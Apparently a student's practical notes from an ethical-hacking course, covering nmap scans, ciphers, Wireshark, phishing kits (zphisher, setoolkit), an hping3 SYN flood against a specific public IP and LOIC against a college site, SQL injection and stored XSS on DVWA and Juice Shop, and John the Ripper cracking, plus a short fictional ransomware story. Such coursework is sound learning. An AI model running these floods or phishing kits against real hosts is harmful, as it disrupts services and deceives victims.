Practical 1
1) who is website
search website name - all info

2)basic commands
ipconfig(if config -Linux) - checking ip addresses
ping (ip address) - used to check if the host is active or not
netstat - It displays information about network connections and listening ports on your computer.
TCP Flags
 Syn – It initialize the communication
 Ack – It acknowledges the communication
 Rst – It resets the communication
 Urg – It puts the packet on priority
 Psh – It push the packets from the stack
 Fin – It ends the communication
tracert website name - it is used to check the route
systeminfo - it is used to check the information of the system

3) DNS enumeration
nslookup - used to map the domain name with ip address

4) Net bios enumeration
netstat --help

5) nmap - network mapper - scans the ip
1. Intense Scan, No Ping
Logic: The question says skip host discovery, so this scan does not rely on ping first.

2. Ping Scan
Logic: Used to discover which hosts are currently active/alive on the subnet.

3. Not Covered by Practical 1
Logic: The scans in Practical 1 do not specifically provide a scan for the condition where SYN packets are blocked but TCP connections are allowed.

4. Not Covered by Practical 1
Logic: Practical 1 does not separately include TCP Connect Scan and SYN Scan, so their comparison cannot be made using only the given scans.

5. Quick Scan Plus
Logic: This is the closest scan for quickly checking ports while gathering additional information. Practical 1 does not specifically mention top 100 ports with service-version detection.

6. Intense Scan
Logic: Used when detailed information about the target is required. It provides more information than a Quick or Regular Scan.

7. Intense Scan, No Ping
Logic: Used when ICMP/ping is blocked because it can proceed without relying on ping-based host discovery.

8. Intense Scan Plus UDP
Logic: Used because the question specifically requires scanning UDP ports.

9. Intense Scan
Logic: Used for detailed target information. Practical 1 does not separately specify an OS-detection scan.

10. Intense Scan
Logic: Used for detailed scanning. Practical 1 does not separately specify a scan combining OS detection, service versions, NSE scripts, and traceroute.

Practical 2
cryptography
1) Caesar cypher
set the number value
2) Playfair algo
add a key 
3) Vernam cipher
text
make a text file with otp 


Practical 3 wireshark
capture packets/ sniff packets - Options - select all ethernet
go to acunetix test login page - username - test password - test 
http -  get and post in wireshark(apply filter)
tcp.flags.fin == 1

Practical 4 social engineering
sudo su 
git clone https://github.com/htr-tech/zphisher.git
chmod -R 777 zphisher/
cd zphisher/
./zphisher.sh

setoolkit
y

Fictional Cyber Crime Case
Two Crimes – One City
On 31st July 2026, 2:50 Hrs, the rain-soaked streets of Mumbai reflected neon lights as Jai Hind College closed its doors for the night. The Principal, Mr. Rao, exhausted after a long day, checked his phone one last time.

A WhatsApp message from an unknown number blinked onto his screen.

“Exclusive Jai Hind College Pack – Free for Students.”

It seemed harmless, even generous—a small gift for the college’s aspiring students.

He forwarded the link to the official WhatsApp group, not knowing that this single act was about to turn Jai Hind College into a stage for digital chaos.

By midnight, the first whispers of malfunction began. Systems froze. Files glitches.

By dawn, every computer was locked behind a black screen.

A timer ticked down in red while a robotic voice repeated:

“You are now encrypted. Pay ₹50 lakh within 48 hours… or face silence forever.”

Student projects, financial records, class schedules, and administrative data were all locked. The college stood in silence, its academic operations strangled by invisible digital chains.

Meanwhile, approximately 5 kilometres away in Mumbai, the Vice Chancellor, Mr. Chandrahauns Murri, of K.C College, opened an anonymous email on 1st August 2025, 08:50 Hrs.

The message was simple but devastating:

“Final-year examination papers of Jai Hind College have been leaked.”

Screenshots showed confidential examination PDFs circulating in a private group.

The university’s secure server logs later revealed that a professor’s credentials had been used to access the examination folder one night earlier. During an inspection of the college staff laboratory, investigators discovered a small black device hidden behind a workstation.

The last person recorded using that terminal was Ravi Bahl, an intern IT assistant.

It began with two crimes, a city too blind to see, and one signature that sealed the fate of the education system.

Practical 5 - DOS attack
hping3
nslookup 
hping3 --flood -S -p 80 217.21.91.156
wireshark - capture packets
ip.addr==217.21.91.156

download loic
college url and ip - catch packets on wireshark

Practical 6 - BurpSuite and DVWA
go on burpsuite - proxy
open browser - juice-shop.herokuapp.com/#/login - login - test test 
proxy - http history - get the packet - post packet 
check request and response
send post packet to intruder 
sniper attack - add s
sql injection payloads in browser - readme copy generic sql injection payloads 
paste in payload configuration - start attack 
results and response - copy token 
decoder - smart decode - copy password - decode the hash - get the password and email 
login again 

DVWA
server.vulnapp.id/dvwa/login.php
login admin password
reset database in setup 
set security to low
sql injection add user id as 1, a' or ' ' = ', 1=1 , 1*

Practical 7 - study of password cracking
(Md5(message digest algorithm) is used to create hash values)
go to browser - md5 hash calculator
write admin  - generate - md5 hash copy 
desktop - new folder(prac7) - create file - demo.txt 
paste md5 hash - ctrl s
open hash identifier - paste hash value 
(Hash identifier is a tool used to identify possible hashes a user can store password encrypted form using different hashing algorithm like md5, sha and ntlm)
copy sha1 hash 
paste in demo.txt - ctrl s 
paste in hash identifier
(rockyou: it is a plain text file that contains a list of commonly used password. Approximately 15 lacks passwords are stored in rockyou that was previously leak or compromised. In kali linux by default rockyou file is stored in (/usr/share/wordlists) directory)
file sysyem - /usr/share/wordlists - copy file
paste in prac7 folder and extract
search john 
(John the ripper: it is an open source password cracking tool used to crack encrypted password, hash password, default passwords and other commonly used passwords. It can also used by security analyst to check the strength of the password and find its vulnerabilities.)
copy path for rockyou and demo 
sudo john --format=raw-md5 --wordlist=/home/kali/desktop/prac7/rockyou.txt /home/kali/desktop/prac7/demo.txt

Practical 8 -
start dvwa - reset database - login again 
set security to low
xss stored - name - test 1 
message - <script>alert("XSSAttack")</script>
signguestbook done 
